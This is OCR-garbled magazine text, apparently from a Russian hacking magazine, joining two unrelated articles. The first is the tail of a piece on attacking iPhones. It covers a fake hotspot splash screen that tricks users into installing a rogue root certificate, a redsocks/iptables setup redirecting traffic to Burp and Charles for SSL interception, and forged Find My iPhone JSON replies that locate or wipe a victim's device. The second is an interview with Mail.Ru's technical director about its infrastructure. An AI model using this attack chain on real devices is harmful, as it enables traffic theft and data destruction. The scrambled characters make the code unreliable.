том». Злоумышленник, визуально маскируя іРЬопе ЗрІазЬзсгееп 
(то окошечко, которое «выезжает снизу» с предложением залоги- 
ниться на Ьоізроі) под системный интерфейс, может предложить 
пользователю «Принять профиль для выхода в интернет» и вы- 
полнить необходимые манипуляции — юзер, сам того не понимая, 
таким образом установит корневой сертификат. При этом для 
большего успеха злоумышленник может эффектно прикрываться 
каким-нибудь раскрученным брендом. 

Имея такой инструмент, не слишком сложно, находясь в ѴѴі-Рі- 
радиусе устройства, подсадить пользователя на нужный хотспот 
(отключив его, например, через старую утилиту аігеріау-пд от всех 
остальных точек) и подождать, когда несчастный захочет восполь- 
зоваться Сетью. Конкретно от пользователя требуется три действия: 

1 . Подтвердить подключение к хотспоту. 

2 . Нажать«Принять» в открывшемся зрІазЬзсгееп'е. 

3 . Дважды нажать«Установить» в открывшемся меню настроек. 

Вот и все. Самое сложное тут — грамотно настроить хотспот. 
После того как пользователь установит сертификат, Ьоізроі «пу- 
скает» его в интернет, а все 551-сессии фактически становятся 
скомпрометированы. Здесь стоит вспомнить, что все приложения 
на іРЬопе/іРасІ работают через демон зесигііусі, а значит, нападаю- 
щий получает доступ сразу ко всему трафику, начиная с почты и 
заканчивая РауРаІ и Арр 5іоге... 



КАК СДЕЛАТЬ МІТМ УДОБНЫМ? 



Идея подобной МІТМ -атаки не сильно моложе асимметричной 
криптографии и можетбыть реализована, к примеру, так: 

1 Создается самозваный СА с помощью 0реп551. 

2. Далее поднимается хотспот (я использовал СЫІІі5роС 
ѵѵѵѵѵѵ.сЫІІізро^.іп[о ). Маскировка зрІазЬзсгееп под интерфейс 
іРЬопеупрощается за счет какой-нибудь готовой библиотеки 
стилей, например іѴѴеЬкіС 

3. Далее весь интересный 551-трафик необходимо направить на 



специальный прокси-сервер. С этим идеально справляется уста- 
новленная на шлюзеутилита гесізоскз ( сІагкк.пеСги/гесІзоскз ) с 
воттаким конфигом: 

Ьазе{1о§_с1еЬи§ = оп; 1о§_іпТо = оп; 1о§ = " б1е:/1:тр/ 

гесІсІі.1о§"; сіаешоп = оп; гесіігесііог = ірІіаЫез;} 

гесізоскз { 1оса1_ір = 0.0. 0.0; 1оса1_рог1: = 31 337: 

ір = 127.0.0.1; рог1: = 31338; 1:уре = ІгІ:1:р-соппе с1: : > 

и правилами ірІаЫез: 

ірІіаЫез -1; па1; -N КЕ050СК5 

ірІіаЫез -1; па1; -А КЕ050СК5 -сі 0.0. 0.0/8 -д КЕТУКМ 

ірІіаЫез -1; па1; -А КЕ050СК5 -сІ 10.0.0.0/8 -д КЕТУКМ 

ІрІіаЫез -1: па1: -А КЕР50СК5 -сІ 127.0.0.0/8 -і КЕТЦКМ 

іріаЫез -1: паі -А КЕР50СК5 -сІ 169.254.0.0/16 -і КЕТЦКМ 

іріаЫез паі ^А КЕ050СК5 -сІ 172.16.0.0/12 -д КЕТУКМ 
іріаЫез -і па1і -А КЕ050СК5 -сІ 192.168.0.0/16 -д КЕТУКМ 

іріаЫез -і паі -А КЕ050СК5 -сІ 224.0.0.0/4 -д КЕТУКМ 

іріаЫез -1: паі -А КЕ050СК5 -сІ 240.0.0.0/4 -д КЕТУКМ 

ІрІіаЫез -1: па1і -А КЕР50СК5 -р іср - -сІе5І:іпа1:іоп-рог1: \ 

443 -1 КЕРІКЕСТ --ІІО-РОГІІ5 31337 

іріаЫез -і: па 1і -А КЕР50СК5 -р іср --сІе5Іііпа1ііоп-рог1і \ 
80 -д КЕОІКЕСТ --іо-рогіз 31339 
іріаЫез -і паі -А РКЕКОУТІМС -і аі0 -д КЕ050СК5 

Из этих правил следует, что в сети нашего хотспота ни один па- 
кет не попадет в интернет. А вот пакеты на заданные порты (443 
и 80) лягут на локальные порты шлюза, где их уже будут ждать 
проксирующие серверы (для открытого НТТР подойдет Вигр 
Ргоху). НТТР5 в нашем случае ложится в Ребзоскз (пользуясь 
случаем, еще раз благодарю коллегу багкк за столь простое и 
полезное изобретение). 

4. Ребзоскззатем передаеттрафик в СЬагІез Ргоху 

( ѵѵѵѵѵѵ.сЬагІе ху^шп), который уже слушает на 31338-м порту. 
«Чарльз» хорош тем, что налету генерирует и подписывает 
сертификаты для всеххостов, ккоторым клиентпытается обра- 
щаться. Для этого он использует за груженную в него приватную 
пол овину сгенерированного корневого сертификата. 
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С этого момента злоумышленник может проводить МІТМ-атаки 
на любые серверы, где не выполняется контроль подлинности 
клиента. 



СИДЕТЬ! ЛЕЖАТЬ! УМРИ! 



Теперь, когда в распоряжении есть инструмент для обхода сер- 
верной аутентификации, самое время вспомнить об уведомлениях 
через РизЬ. Так как в технологии используется двухсторонняя 
аутентификация, то полноценно проксировать данные, не залезая 
в іРЬопе за ключами, не получится. Однако стать АРМз-сервером, 
который пройдет аутентификацию на устройстве, уже ничто не 
мешает. Как только к фальшивому РизЬ -серверу подключится І05 
ничего не подозревающего пользователя, злоумышленник может 
сразу отправить ему сообщение, о котором я уже говорил выше: 

{ 

"зегѵегСоп1;ех1;" : { 

"1:ар5епс1Т5" : "2Ѳ12-Ѳ5-Ѳ8Т18 : 55 : 36 . 6687" . 

"1:ар$епс1Соп1:ех1:" : "-Ршір" 

} 



Дата здесь не принципиальна, а ключевое слово І^пгіір отдает 
команду на запуск сеанса связи с РіпсІ Му іРЬопе. Получив сообще- 
ние, І05 втихую обращается в іСІоиб, используя НТТР5 (причем 
используется довольно занятная мутация НТТР с впечатляющим 
количеством заголовков и специфичными кодами). Первым с 
устройства приходит Р05Т-запрос (исходный «однострочник» 
приведен к читаемому виду) со следующим телом (здесь и дальше 
приведена только самая информативная часть): 

{ 

"сІеѵісеІп-Ро" : I 

"ЬиіІсІѴегзіоп" : "9В176", 

"арз-1:океп" : "285сс1аа-р-РеЬ5-Р8767233еЬс1-РеЗа2с1-Р07 
797ае864е586се902с321-Р222-Р84с1333", 
"раз5сосІеСоп5І:гаіп1:51:г" : "Епііег а -Роиг-сіі^іі: раззсосіе.". 

"сІеѵісеСоІог" : "Ыаск". 

"ргосІисІіѴегзіоп" : "5.1". 

"Ьа1:1:егуіеѵе1" : 0.1292443^ 

"сІеѵісеМате" : "іРІіопе Ііезі:"^ 

"ІосаІііопБегѵісезЕпаЫесІ" : 1:гие^ 

"бпсІМуіРІіопе" : 1:гие. 

"ргосІисІіТуре" : "іРІіопе2. 1" . 

"исіісі" : "7Ьеа-Ра302сІ46Ь670-р0657с00а-Р720с347-Р5-РіеЬ8% 
"раз5сосІеСоп5І;гаіп1:" : "зітріе" ^ 

"сІеѵісеСІазз" : "іРІіопе". 

"Ьа1:1:егу51:а1:и5" : "С1іаг§іп§"^ 

"раз5сосІеІ55е1:" : 1:гие 

"зегѵегСопІіехІ:" : { 

"1:ар5епсІСоп1:ех1;" : "-Ртір"д 
"1:ар5епсІТ5": "2012-05-08121:05:37.1322" 

"сІеѵісеСоп1:ех1:" : { 

"сІеѵісеТБ" : "2012-05-08Т21 : 05 : 38 . 2102" 

} 

} 



Из него уже можно почерпнуть много интересной информации. 
Цель этого запроса — узнать команды, которые были адресованы 
устройству через систему удаленного управления. И тут мы под- 
ходим к самому интересному: а что можно послать? Базовый на- 
бор обнаруживает себя, если посылать запросы устройству через 
іСІоиб. Например, если притвориться сервером, то можно послать 
команду, которую использует іСІоиб для определения координат 
устройства: 
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'АН- антнѵтчин 
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Данные, передаваемые по 551, отображаются в открытом виде! 





Перехваченные пароль и логин для доступа к Арр 51оге 



"епсІТІігеБІіоІсІ" : 10. 

"аскикі" : "Іі1;1;р5://р02--Ртір.іс1оисІ.сот:443/ 

-Ртір5егѵісе/бпсІте/403955807/7Ье6-Ра307846Ьб7 

0-р0346с00а-Р720с347-Р5-Р1еЬ8/аскІоса1;е'Ц 

"сІесауРасІіог" : 0.7. 

"сІеБІгесІАссигасу" : 40^ 

"5І:аг1:ТІіге5Ііо1сІ" : 2000, 

"1оса1:іопѴа1ісІі1:уОига1;іоп" : 120^ 

"ісі": "6сІ-РЗ-р-Рб-р--Р365-499е-Ь921-93641206Ь-р-Ра'Ц 
"епциеиеТіте5І:атр" : 1336505766732^ 

"стсі": "Іосаііе". 

"іпс1исІеТгаскіп§Іп-Ро" : ■Ра15е^ 

"оѵеггісІепСотпіапсІРотаіп" : пиіі . 

"1оса1:іопТіпіеои1:" : 120, 

"бпсІМуіРІіопе" : 1:гие. 

"ге5роп5еТіте51;атр" : 1336505766732 

} 



Через некоторое время (если оно нужно для установки коорди- 
нат) устройство отдаст весьма подробный ответ: 

{ 



"1оса1:іопРіпІ5ІіесІ" : -Раізе^ 


"сІеѵісеСоп1;ех1;" : I 


"сшсіісі" : 


"6сІ-Р56-Рб-р--Р445-499е-Ь921-93641006Ь-Р-Ра", 


"сІеѵісеТБ 


": "2012-05-08119:36:11.3912" 




"сІеѵісеІп-Ро 


": 1 


"исІісІ": " 


77Ье6-Ра307846Ь670-р0346с00а-Р720с347-Р5-РіеЬ8" 


"аіі:": 141. 


3043212890625. 


"оо5І1:іопТѵое" : "Ілііб". 


"ѵегІіАсс" : 


10. 


"1оп§і1;исІе" 


: 37.5862605508342^ 


"1а1;і1;исіе" : 


55.72784808181711^ 


"5І;а1;и5СосІе 


": 200. 


"1;іте5І:атр" 


: "2012-05-08119:36:09.1952", 
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"богігопІіаІАссигасѵ" : 71 . 1873037658878 

} 

Но какой толк в СР5-координатах, когда жертва и так висит 
на специально поднятом хотспоте? :) Гораздо аппетитней другая 
базовая команда — ѵѵіре, которая уничтожает все данные и от- 
катывает устройство к заводским настройкам. Все, что нужно 
злоумышленнику для проведения такого нападения, — ответить 
устройству: 

{ 

"тезБа^е": 

"ісі" : "06с0а5-Р9-5126-4428-Ь875-59асЬЬ956714% 
"епциеиеТітезІіатр" : 1336510929036^ 

"стсі": "ыіре", 

"Ріп": 

"оѵеггісІепСоттапсЮотаіп" : пи11^ 

"аскІІКІ": "ІтІ:1:р5://р02--Ртір.іс1оисІ.сот:443/ 

■Ртір5егѵісе/бпсІте/408888807/0346с 
а302сІ46Ь670-р0346с00а-Р720с347-Р5-РіеЬ8/аск", 
"гезропзеТітеБІіатр" : 1336510929032^ 

"ѵегі-руикі" : "Іі1:1:р5 : //р02--Ртір . ісіоисі . сот : 443/ 
■Ртір5егѵісе/бпсІте/408888807/0346с 

7802сІ46Ь670-Р0346с00а-Р720с347-Р5-РіеЬ8/ыіреѴегі-Рѵ" 

} 

Здесь нужно понимать, что параметры «408888807/0346с 780264 
6Ь670Ш346с00аП20с347^5^1еЬ8/» в ІІРІ индивидуальны для каждо- 
го устройства (однако они извлекаются из тех адресов, к которым 
обращается устройство). Поле \6 — уникальный идентификатор 
сообщения: если он будет использоваться для какого-то сообще- 
ния повторно, то оно не будет обработано. Итак, после получения 
такого ответа устройство подтвердит получение, отправив на 
ѵегіі^уиРІ сообщение: 

{ 

"І6" : "06с0а5-Р9-5126-4428-Ь875-59асЬЬ956714" . 

"аскІІКІ" : "Іі1:1;р5 : \/\/р02--Ртір . ісіоиб . сот:443\/ 
■Ртір5егѵісе\/бп6те\/408888807\/0346с 
7802646Ь670-р0346с00а-Р720с347-Р5-РіеЬ8\/аск", 

"6еѵісеСоп1іех1:" : { 

"беѵісеТЗ" : "2012-05-08Т21 : 05 : 39 . 6042" 

"епдиеиеТітезІіатр" : 1336510929036. 

"гезропзеТітеЗІіатр" : 1336510929032^ 

"беѵісеІп-Ро" : I 

"ЬиіІбѴегзіо п" : "9В176". 

"ар5-1:океп" : "285с6а0-р-РеЬ5-р-Р767233еЬ6-РеЗа46-р07 
797ае864е586се902с321-Р222-Р846333", 
"ра55со6еСоп5І:гаіп1:51:г" : "Епііег а -Роиг-бі^іі: раззсобе.". 

"беѵісеСоІог" : "Ыаск". 

"рго6ис1:Ѵег5Іоп" : "5.1". 

"Ьа1:1:егуіеѵе1" : 0.1292443^ 

"1оса1:іоп5егѵісе5ЕпаЫе6" : 1:гие^ 



ПОЛУЧИВ КОМАНДУ, 

105 НЕЗАМЕДЛИТЕЛЬНО 
ЗАПУСКАЕТ ПРОЦЕСС 
ПОЛНОГО УНИЧТОЖЕНИЯ ВСЕХ 
ПОЛЬЗОВАТЕЛЬСКИХ ДАННЫХ 



"бпбМѵіРІіопе" : 1:гие. 

"ргобисІіТѵре" : "іРІіопе2Л". 

"и6і6" : "7Ьеа-Ра302646Ь-Р-Р-Р-Р0346с00а-Р720с347-Р5-Р1еЬ8", 
"ра55со6еСоп5І:гаіп1:" : "зітріе" , 

"беѵісеСІазз" : "іРІіопе". 

"ра55со6еІ5$е1і" : 1:гие 

"оѵеггібепСоттапбРотаіп" : пиіі, 

"тезза^е": 

"з1:а1:изМезза§е" : "ОК". 

"ѵегі-РѵЦКІ" : "Ітіііірз : \/\/р02--Ртір . ісіоиб . сот:443\ 

/-Ртірзегѵісе\/1іп6те\/408888807\/0346с 

7802646Ь670-р0346с00а-Р720с347-Р5-РіеЬ8\/ыіреѴегі-ру"^ 

"стсІ": "ыіре", 

"ріп": 

"стбСопІіехІ:" : { 

"аскІІКІ" : "Ітіііірз : \/\/р02--Ртір. ісіоиб . сот:443\ 

/-Ртір5егѵісе\/1іп6те\/408888807\/0346с 

7802646Ь670-р0346с00а-Р720с347-Р5-РіеЬ8\/аск", 

"тезза^е": 

"І6" : "06с0а5-Р9-5126-4428-Ь875-59асЬЬ956714", 
"ѵегі-руІІКІ" : "Іі1;1;рз : \/\/р02--Ртір. ісіоиб . сот:443\ 
/■Ртірзегѵісе\/1іп6те\/408888807\/0346с 

7802646Ь670-Р0346с00а-Р720с347-Р5-РіеЬ8\/ыіреѴегі-Рѵ". 

"епдиеиеТітезІіатр" : 1336510929036 . 

"стсі": "ыіре". 

"гезропзеТіте51;атр" : 1336510929032^ 

"ріп": 

"оѵеггібепСоттапбОотаіп" : пиіі 

"з1:а1:изСо6е" : 200 

} 

Получив в ответ код 200 (код 200 — НТТР-статус-код, который 
свидетельствует о корректной обработке запроса), І05 незамедли- 
тельно запускает процесс полного уничтожения всех пользователь- 
ских данных, перерождаясь девственно чистой, как с прилавка! 
Здесь стоит вспомнить про полезный баг: если ты случайно за- 
пустил ѵѵіре на чужом іРЬопе, то сразу после угасания экрана сделай 
ему зоН гезеі двумя кнопками. Если успеешь, то после перезагрузки 
процесс не возобновится и все будет, как раньше. А если боишься 
не успеть и все-таки собираешься экспериментировать, то сделай 
бэкап в іСІоиб. 



итог, или только НАЧАЛО? 



Этот материал лишь немного проливает свет на внутреннюю кухню 
Арріе, про которую в публичном доступе нет никакой документации. 
Чтобы расширить и закрепить успех, необходимо продолжать ис- 
следования в нескольких направлениях: 

1. Поисквозможностей доступа кданным через интерфейсудален- 
ного управления. Есть все основания предполагать, что одними 
командами ѵѵіре и Іосаіе дело не ограничивается. 

2. Поиск способов создания элементов присутствия на скомпроме- 
тированныхустройствах (загрузка поддельныхобновлений как 
один из вариантов). 

3. Оптимизация процедуры доставки сертификата. 

Кроме этого, в статье обозначен новый социальный вектор 
нападения на мобильные устройства — внедрение самозваного 
корневого сертификата, который неплохо бы изучить на всех по- 
пулярных платформах. И в 1001-й раз было доказано: даже хорошая 
криптография в руках того, кто не знает, что это, подчас теряет вся- 
кий смысл. А Арріе'у, несмотря на колоссальную и, в общем, хорошо 
проделанную работу над безопасностью, остается порекомендовать 
пересмотреть политику равноправия всех корневых сертификатов и 
как-то научиться доносить до своей аудитории, что не все корневые 
сертификаты одинаково полезны. Только вот реально ли это? ^ 
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ТЕХДИРМАІІ.РУ 

ВЛАДИМИР ГАБРИЕЛЯН 



МаіІ.Ри — это давно не просто почтовая служба, которой все мы когда-то пользовались. Теперь это 
микс из самых разных сервисов, включая социальные сети, мессенджеры и онлайн-игры. Наш гость — 
человек, который отвечает в компании за технологии. Придя в МаіІ.Ри на позицию простого ІІМІХ- 
администратора, Владимир Габриелян сумел стать техническим директором МаіІ.Ри Огоир и сейчас 
готов рассказать о том, как проекты компании устроены изнутри. 
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ОДИННАДЦАТЬ ЛЕТ НАЗАД В МАІЬ.Ви 
РАБОТАЛО 60 ЧЕЛОВЕК И ОКОЛО 200 СЕРВЕ- 
РОВ. ОСНОВНЫМ ПРОЕКТОМ БЫЛА ПОЧТА 



Все эти продуктовые изменения несли за 
собой огромное количество изменений техно- 
логических. Ведь когда парк серверов растет 
со ста с небольшим машин до десяти с чем-то 
тысяч, приходится менять подходы буквально 
ко всему. 

Сейчас мы осваиваем разработку поис- 
ковых технологий. Для нас создание поиска 
было и остается и новым, и сложным. И это очень 
интересно. :) 



о КАРЬЕРЕ 



Компьютеры и информационные технологии 
всегда были моим хобби и остаются им до сих 
пор. У меня нет образования в области инфор- 
мационных технологий. Зато есть опыт, уже, 
можно сказать, пятнадцатилетний. 

В МаіІ.Ви я пришел одиннадцать лет на- 
зад, простым сисадмином. В компанию попал 
почти случайно — здесь работал мой това- 
рищ, который и позвал мне «к себе». Сначала 
я руководил системными администраторами, 
потом, через пару лет, стал техническим руко- 
водителем почты, а в 2005 году — техническим 
директором. 

Одиннадцать лет назад в МаіІ.Ри работало 
60 человек и около 200 серверов. Основным 
проектом была почтовая служба — и это по 
большому счету все, что тогда было. 

Сейчас компания выросла, но в ней по- 
прежнему чувствуется дух стартапа. Здесь 
открыт путь любым изменениям и новым идеям, 
что очень приятно. У нас нет каких-либо жест- 
ких правил, вроде «мы ходим только с левой 
ноги». Ты каждый день можешь привносить что- 
то новое в свой рабочий процесс, в техническую 
жизнь компании. 

Важно, чтобы работа тебе нравилась. Даже 
если приходится работать сверхурочно, даже 
если приходится делать что-то сложное — это 
все равно удовольствие. Конечно, такой подход 
дает огромное преимущество перед людьми, 
которые просто исполняют свои обязанности. 

«В 11 пришел, в 8ушел» — не наш случай. 



ЧЕЛЕНДЖИ МАІІ.КибРОЦР 



Одиннадцать лет назад нашим основным про- 
ектом была только почта. Уже потом появились 
социальные сети, мессенджер и так далее. 
Сейчас почта тоже является важным для нас 
проектом, но есть и другие крупные подраз- 
деления. 

Одно из важных в истории компании собы- 
тий произошло в 2003 году. В тот момент, когда 
безоговорочно царствовала ІСО, мы собрались 
и подумали, что одного мессенджера на такую 
огромную страну, как Россия, будет мало. Но 
взять и «подвинуть» ІСО? Это была большая 
авантюра. Даже я немножечко сомневался в 
успехе, а среди моих знакомых и друзей во- 
обще почти никто не верил, что нам удастся 
потеснить ІСО на этом рынке. Так мы запустили 
собственный мессенджер, который называется 
МаіІ.Ри Агент (хотя ваши читатели, наверное, его 
и недолюбливают — изначально им пользо- 
вались больше обычные люди, чем ІТ-шники). 
Сегодня же это первый мессенджер по количе- 
ству пользователей в России, а ІСО, на которую 
мы равнялись, вошла в состав МаіІ.Ри Сгоир. 

Разработка мессенджера стала для нас 
увлекательным испытанием. Сделать мессен- 



джер таким, чтобы он натребовал огромного 
парка серверов, но в то же время позволял 
нескольким миллионам пользователей быть 
онлайн, — довольно тяжелая задача. Ктому же 
одно дело разрабатывать веб-сервисы и совсем 
другое — клиентские приложения. К примеру, 
мы и представить не могли, с какими пробле- 
мами столкнемся для реализации голосовой 
связи. Передать голос просто, но сделать 
так, чтобы голос мог передаваться на плохом 
канале, с нестабильной связью, чтобы при 
этом у вас не было отставания и эха, — это уже 
целая наука. Такие задачи требуют не только 
умения хорошо кодить, но и отличного знания 
математики. 

Следующей серьезной вехой, если гово- 
рить о развитии продуктов, стали социальные 
сети. Мы запустили свою социальную сеть 
«Мой Мир», а уже, так скажем, «в новейшей 
истории» к нам присоединились «Одно- 
классники». Сложная задача — разработать 
архитектуру социальной сети так, чтобы, с 
одной стороны, у вас на странице было боль- 
шое количество данных с разных серверов, а 
с другой стороны, все продолжало работать 
и не тормозило, если вдруг какой-то сервер 
или кластер серверов отвалится. Нужно было 
обеспечить устойчивую работу с информацией 
из огромного числа хранилищ. Эту задачу мы 
решали довольно долго. 



Р&О 



Под каждый проект у нас существует собствен- 
ная команда разработки. К примеру, команда 
разработки поиска, команда почты, команда 
мессенджеров и так далее. Команда разработчи- 
ков нанимается под каждый отдельный проект 
и увеличивается/уменьшается в зависимости 
от того, как этот проект работает. Сейчас таких 
команд около двадцати пяти. В зависимости от 
масштаба проекта команда может насчитывать 
от пяти до шестидесяти человек. 

Наш стек выглядит следующим образом: 
те части программных комплексов, которые 
работают под высокой нагрузкой, мы в основном 
разрабатываем на С/С++. На РегІ мы делаем те 
части, которые подвергаются частой модифи- 
кации, и те, которые дорого или неудобно раз- 
рабатывать на С. Также мы используем РуіЬоп и 
совсем чуть-чуть РиЬу. 

В нашем случае совершенно отказаться 
от РегІ уже, наверное, невозможно — у нас 
гигабайты кода на нем. Все это жалко выбрасы- 
вать, к тому же это не имеет никакого смысла. У 
нас очень хорошая команда РегІ-разработчиков. 
Вообще, не так уж важно, на каком языке вы 
программируете. Вы либо программируете, либо 
нет. Если вы хороший программист и сталкивае- 
тесь с модулями на РегІ, рано или поздно вы его 
выучите — это очень простой язык. Он хорош 
именно своей простотой. 




Практически все инженеры МаіІ.Ри используют для работы несколько мониторов 
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С0ѴЕК5Т0КУ 




Здесь в МаіІ.Ри бгоир варятся игры :) 



Система разработки строится так: вы 

работаете в своей рабочей группе. Когда 
вы делаете соттіі (изменения в коде), ваш 
руководитель должен сделать проверку 
вашего кода (мы это называем «ревью») — 
после этого код попадает в тестовую ветку. 
Тестовую ветку вы сами можете выложить 
на свои тестовые серверы и посмотреть, как 
все работает. Когда вы завершили какую-то 
большую задачу и написали все, что для нее 
необходимо, руководитель отдела разработки 
передает это в отдел эксплуатации. Он рас- 
сказывает, что было сделано, какие повлекло 
за собой изменения, и с этого момента уже 
начинается работа сисадминов. Только они 
имеют доступ к продакшену, только они могут 
задеплоить то, что написали разработчики. 
Таким образом, они же несут ответственность 
за работу продакшена, и они дадут вам фид- 
бэк о том, произошла ли какая-то проблема 
при развертывании вашего кода. 

Разумеется, мы используем только Ореп 
Зоигсе технологии и Ііпих. Дело в том, что 
нагрузки очень высоки, и часто приходится 
сталкиваться с чем-то в первый раз. А когда 
у вас есть исходный код и проблема загоняет 
вас в угол, Ореп Зоигсе позволяет в крайнем 
случае просто открыть исходник и поправить 
там то, что вам не нравится. Это происходит 
не так часто, но сама возможность сделать 
это, если необходимо, дорогого стоит. 

К примеру, часто операционная систе- 
ма не поддерживает новое железо. Так что 



самый распространенный случай — нужно 
написать какие-то драйверы. Также мы ис- 
пользуем довольно много различных балан- 
сировщиков. Соответственно, место в ядре, 
которое отвечает за сеть и которое мы можем 
использовать для балансировки, нами очень 
сильно оптимизировано. Или, например, нам 
часто приходится править что-то в пдіпх, что- 
бы вся наша система работала еще быстрее. 

Мы часто правим баги. Мы внутри МаіІ.Ри 
Сгоир обычно начинаем тестировать продук- 



ты раньше, чем они становятся стабильными, 
поэтому исправлять ошибки нам не привыкать. 
Свежий пример. В поиске мы используем Набоор 
и НЬазе в качестве хранилища, и это тоже до- 
вольно сырой продукт. Так вот, он весь «ис- 
топтан» нашими патчами и фиксами — и чтобы 
сделать его более стабильным, и чтобы заточить 
его под нашу поисковую систему. 

Делать коммит в открытые проекты только 
для себя или сделать его публичным — всегда 
решает сама команда разработки. Следует по- 
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Интервью с техническим директором МаіІ.Ри Згоир 




нимать: чтобы сделать любой продукт публичным 
(даже свой собственный патч), нужно выполнить 
большую работу, чем если делать тот же патч для 
себя. Поэтому каждая команда разработки реша- 
ет, насколько ее детище будет полезно обществу. 

У нас, кстати, есть и свой собственный 
Ореп 5оигсе продукт — Тагапіооі. Изначаль- 
но цели делать открытый проект, конечно, не 
было. Более того, я вообще не верю, что можно 
сделать продукт в вакууме — вот соберемся мы 
с вами и сделаем некий хороший продукт. Как 
правило, сначала ты сталкиваешься с какими- 
то потребностями, которые никто не может 
покрыть, потом делаешь продукт для себя и в 
какой-то момент понимаешь, что получилось не- 
плохо — этот продукт можно отдать. Именно так 
произошло с нашим кеу-ѵаіие зіогаде, и я лично 
могу порекомендовать его всем, кто работает с 
высокими нагрузками и кому нужно надежное 
хранение данных. 

Тагапіооі — это кеу-ѵаІие база данных. 

Мы не можем позволить себе терять данные, 
поэтому для нас она важна в первую очередь 
скоростью и тем, что позволяет бэкапить данные 
и не терять их при перезагрузке сервера. На тот 
момент, когда мы начинали ее разрабатывать, 
ничего похожего не существовало. Мы использу- 
ем эту разработку в огромном количестве наших 
продуктов и можем гарантировать, что будем 
поддерживать ее всегда. То есть можно без 
страха брать и использовать ее в своих продук- 
тах, рассчитывая на нашу команду разработки. 



Как сделать достойный Ореп Боигсе проект? 

Мы поняли, что не знаем ответа на этот вопрос. 
Просто выложить репозиторий с кодом в открытый 
доступ — явно недостаточно. Поэтому мы искали 
человека, который знает, как именно это делается. 
В итоге проектом занимается Костя Осипов, кото- 
рый раньше работал в МуБОІ. Дело в том, что тогда 
у нас не было опыта развития Ореп Боигсе про- 
дуктов. Это все-таки немного другая идеология, 
чем написание софта на заказ и тому подобные 
вещи. Для этого нужно уметь работать в комьюни- 
ти, нужно уметь привлекать в него людей, уметь 
рассказать людям, почемуты лучше, чем другие. А 
Костя в МуБОІ очень много работал с Ореп Боигсе 
продуктами: он понимает и знает, как все это дела- 
ется. Мы искали именно такого человека. 



СЛУЖБА ЭКСПЛУАТАЦИИ 



У нас шесть дата-центров, все они находятся 
в Москве. К сожалению, инфраструктура на- 
шей страны такая, что за пределами столицы 



дата-центры делать бессмысленно. Проблема 
кроется в каналах: дата-центр можно постро- 
ить хоть на Урале, но протянуть туда канал уже 
проблематично. 

На данный момент мы ориентированы на 
рынок России и стран СНГ. Большинство на- 
ших пользователей находятся здесь, поэтому 
развивать дата-центры в Европе или США 
нам пока не очень интересно. Мы хотели бы 
иметь дата-центры по России, но тут есть 
ограничение — в стране построено недоста- 
точно каналов, чтобы прокачивать большие 
объемы трафика внутри страны (между дата- 
центрами). На сегодняшний день емкость 
каналов МаіІ.Ри Сгоир составляет примерно 
полтерабита, а реального трафика у нас около 
280 Гбит/с. Но для того, чтобы объединить в 
кольцо серверы, которые находятся, к приме- 
ру, на Урале, потребовались бы баснословные 
деньги. Стоимость каналов превысит стои- 
мость строительства всего дата-центра. Это и 
является основной проблемой. 

В компании за то, чтобы все работало, 
отвечает единая команда эксплуатации. 
Попробую перечислить, кто в нее входит. Это 
системные администраторы, которые занима- 
ются администрированием наших проектов. 
Отдельная дежурная служба, которая 24 часа 
в сутки наблюдает за нашими серверами, 
вовремя замечает и исправляет проблемы. 
Служба эксплуатации дата-центров, кото- 
рая следит, чтобы там все время были свет и 
холод. Служба инженеров, которая отвечает 
за то, чтобы у нас появлялись новые серверы. 
Сложно звучит, но на самом деле, если ставить 
сотни новых серверов в месяц, то требуется 
отдельная служба, которая будет подключать 
новое оборудование и заменять старое, вы- 
шедшее из строя. 

Мы стараемся отойти от «работы руками». 

Не секрет, что чем больше ручной настройки 
вы производите, тем больше вероятность 
ошибки. Соответственно, после того, как к вам 
приехала коробка с сервером, вы его рас- 
паковываете, вставляете в стойку, а дальше 
остается только подсоединить ЕіЬегпеІ и в 
появившемся меню сетевого загрузчика опре- 
делить тип системы, которая будет поставлена. 
Грубо говоря, будет ли этот сервер фронтендом 
или хранилищем. Дальше он настраивается 
автоматически, а по окончании его зеШр'а 
система вводится в работу и подключается к 
системе мониторинга. 

Деплой (развертывание) полностью авто- 
матизирован. Ребята занимаются только тем, 
что постоянно улучшают систему деплоя. Когда 



КОГДА ПРОБЛЕМА ЗАГОНЯЕТ ВАС В УГОЛ, 
ОРЕМ ЗООЯСЕ ПОЗВОЛЯЕТ В КРАЙНЕМ СЛУ- 
ЧАЕ ПРОСТО ОТКРЫТЬ ИСХОДНИК И ПОПРА- 
ВИТЬ ТАМ ТО, ЧТО ВАМ НЕ НРАВИТСЯ 
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серверов много, это может стать узким местом в 
развитии компании. Зато мы можем одновремен- 
но поставить тысячу серверов, останется только 
прикрутить их к стойке и воткнуть хвостики 
ЕіЬегпеІ'а. 



ВНУТРЕННИЕ СТАРТАПЫ 



РиІиЬга — своего рода эксперимент. Мы за- 
пустили стартап внутри большой компании и 
решили посмотреть, что из этого выйдет. 

Первоначальная идея заключалась в том, 
чтобы дать возможность ребятам сделать что- 
то новое. Важно понимать, что, когда вы при- 
ходите работать в большую компанию (несмотря 
на то, что МаіІ.Ри бгоир крайне демократична), 
все равно есть какие-то общепринятые вещи и 
технологии, которые мы используем. А если вы 
работаете в нашем стартапе, у вас есть только 
одно правило: правил нет. Вы делаете, что 
хотите, и пробуете свои силы в создании нового 
продукта. 

Разработчикам был дан полный карт- 
бланш. У РиШЬга отдельная команда, они могут 
использовать или не использовать те вещи. 



которые приняты у нас. Они пытаются делать 
новый продукт, какого в МаіІ.Ри бгоир еще не 
делали. Пока у ребят все получается. 



СТЕК ТЕХНОЛОГИЙ 



Сначала стоит сказать, на чем мы работаем. 

Основная база данныху нас — МуЗОІ, плюс 
наша МоЗОІ СУБД Тагапіооі. В качестве веб- 
сервера мы используем свою собственную 
разработку, пдіпх и АрасЬе, в качестве почтового 
сервера — свой ^огк Ехіт'а, у нас есть даже та- 
кие сравнительно редко встречающиеся вещи, 
как собственный 0М5-сервер. Из «больших ку- 
сков» — это всё, плюс еще огромное количество 
модулей, которые мы писали для себя сами. 

У нас есть набор продуктов, которые по- 
зволяют довольно быстро создать сервисный 
проект. Есть несколько типов собственных 
хранилищ, которые вы можете использовать; 
есть свои собственные веб-серверы, которые 
позволяют очень быстро обрабатывать поль- 
зовательские запросы. Естественно, для них 
написаны модули для авторизации пользовате- 
лей и прочее. У нас есть свои серверы, которые 



позволяют обмениваться сообщениями, где бы 
это вам ни понадобилось. За 13 лет существова- 
ния у нас наработано очень большое количество 
готовых вещей, которые вы как разработчик 
можете у себя применить. Это, конечно, дает 
некую фору по сравнению с командой, которая 
начинаете нуля. 

Относительно балансировки нагрузок есть 
